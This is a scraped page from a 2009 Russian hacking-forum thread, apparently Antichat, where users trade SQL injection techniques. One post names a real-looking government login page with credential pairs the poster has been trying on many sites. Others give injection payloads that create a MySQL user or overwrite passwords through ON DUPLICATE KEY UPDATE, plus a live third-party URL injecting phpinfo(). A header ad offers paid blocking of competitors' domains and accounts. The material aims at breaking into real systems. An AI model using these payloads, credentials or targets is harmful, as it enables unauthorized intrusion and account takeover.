Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1001 из 2422

1001

Опции темы

Поиск в этой теме

Опции просмотра

13.11.2009, 22:38

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

С нами: 9555536

Репутация: 95

http://login.main.cne.gov.pr/login.php
есть следующие пары:
admin

yn@mic
webmaster:2624

Но опять же ни один не подошел! Мне кажется, что я что то не так делаю,т.к. не может не подходить пароли уже к больше чем к 10 сайтам!

𝕏 Twitter Reddit Telegram Копировать ссылку

13.11.2009, 22:55

Ins3t

Участник форума

Регистрация: 18.07.2009

Сообщений: 272

С нами: 8850336

Репутация: 330

Ну если есть инъекция в INSERT/DELETE запросе - то можно.

13.11.2009, 23:04

wolmer

Постоянный

Регистрация: 12.05.2009

Сообщений: 395

С нами: 8947056

Репутация: 229

Цитата:

Сообщение от Ins3t

Ну если есть инъекция в INSERT/DELETE запросе - то можно.

Пример внедрения в студию

13.11.2009, 23:25

Aртем

Познающий

Регистрация: 18.10.2009

Сообщений: 68

С нами: 8717851

Репутация: 90

Цитата:

Сообщение от Ins3t

Ну если есть инъекция в INSERT/DELETE запросе - то можно.

ты забыл добавить одно НО, если у пользователя из под которого работает скрипт ЕСТЬ ПРАВА НА ВЫПОЛНЕНИЕ операторов INSERT/UPDATE/DELETE.

Хотя да, я невнимательно прочитал твоё сообщение. Извиняюсь.

13.11.2009, 23:03

fng

Новичок

Регистрация: 12.11.2009

Сообщений: 20

С нами: 8681832

Репутация: 0

а если в SELECT-е -- нет?

13.11.2009, 23:14

Ins3t

Участник форума

Регистрация: 18.07.2009

Сообщений: 272

С нами: 8850336

Репутация: 330

Скуль в имени таблицы:

Цитата:

INSERT INTO [SQL] VALUES('site','lala','blabla','lolo','aaa');

Цитата:

INSERT INTO [mysql.user (user, host, password) VALUES ('new_user', PASSWORD('password')),a,b,c)/*] VALUES ('site', 'lala', 'blabla', 'lolo', 'aaa');

13.11.2009, 23:19

wolmer

Постоянный

Регистрация: 12.05.2009

Сообщений: 395

С нами: 8947056

Репутация: 229

Цитата:

Скуль в имени таблицы

А если mysql-inj будет в параметрах? (так то если mysql-inj в имени таблицы то это легко крутить)(именно интересует выход за таблицу и запись в другую какую либо таблицу (но скорее всего это не возможно

))

Последний раз редактировалось wolmer; 13.11.2009 в 23:25..

13.11.2009, 23:38

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

С нами: 10274726

Репутация: 1917

например:
INSERT INTO users
SET id ={inj}

INSERT INTO users
SET id =1 ON duplicate KEY UPDATE pass = '12345'

поле id должно быть первичным ключем или просто уникальным

__________________
Карфаген должен быть разрушен...

14.11.2009, 01:23

Ins3t

Участник форума

Регистрация: 18.07.2009

Сообщений: 272

С нами: 8850336

Репутация: 330

Как уже поведал мне товарисч razb, эрроры у тебя из за того, что template в языке С - это ключевое слово, а у тебя это переменная. Переименой ее.

#10

14.11.2009, 03:20

ILYAtirtir

Участник форума

Регистрация: 25.04.2007

Сообщений: 176

С нами: 10024314

Репутация: 739

Там покруче есть)

Цитата:

http://www.whitehall.ru/producer.php?ID=phpinfo()

Страница 1001 из 2422

1001

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules